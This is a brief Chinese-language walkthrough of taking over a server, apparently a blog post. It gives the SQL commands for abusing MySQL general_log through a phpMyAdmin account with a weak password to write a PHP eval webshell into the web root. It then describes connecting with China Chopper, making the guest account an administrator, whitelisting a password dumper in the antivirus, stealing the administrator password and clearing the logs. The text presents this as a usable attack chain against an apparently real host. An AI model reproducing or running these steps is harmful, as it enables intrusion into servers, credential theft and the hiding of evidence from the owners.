弱口令登录phpmyadmin。

phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。

目标服务器:

Apache/2.4.7 (Win32) OpenSSL/1.0.1e mod_fcgid/2.3.9
检查插入条件:

SHOW VARIABLES LIKE "secure_file_priv";

从上图得知值为空,如果我们这时导入一句话,肯定会失败的,不信啊,那我们试试。

我们首先需要检测的是MySQL全局变量(general_log、general_log file)的值。

  1. general log 指的是日志保存状态,一共有两个值(ON/OFF)ON代表开启 OFF代表关闭。
  2. general log file 指的是日志的保存路径。

从图得知general_log默认是关闭的,log日志存放的位置是D:/phpsudy/www/infos.php从上面看来这个站已经有人拿下来过了。

首先我们来理解一下开启general_log 的作用,开启它可以记录用户输入的每条命令,会把其保存在E:\phpstudy\PHPTutorial\MySQL\data\下的一个log文件中,其实就是我们常说的日志文件。好,我们的利用的思路是开启general_log之后把general_log_file的值修改为我们网站默认路径下一个自定义的php文件中,然后我们通过log日志进行写入一句话后门到上面去,然后再进一步利用。
set global general_log = "ON";SET global general_log_file='D:/phpStudy//WWW/1.php';

执行为空但是文件已经创造出来了。
http://127.0.0.1:455/1.php

select '<?php eval($_POST[aa]);?>';
执行成功执行语句被保存了在刚刚那个的1.php里面
尝试菜刀链接,成功链接
最后一步拿下服务器。
目标主机权限administrator 系统是Windows server 2008
使用getpassword直接获取administrator的密码
发现拒绝访问
管理员16点37分才登录过,因为无法执行exe可执行权限,我尝试将guest提升为管理员。
成功链接上服务器,我才发现有360,在服务器上将getpassword添加到白名单,再以管理员的权限执行。获取administrator的密码
登录administrator用户
清楚日志走人。
0

正因为生来什么都没有,因此我们能拥有一切。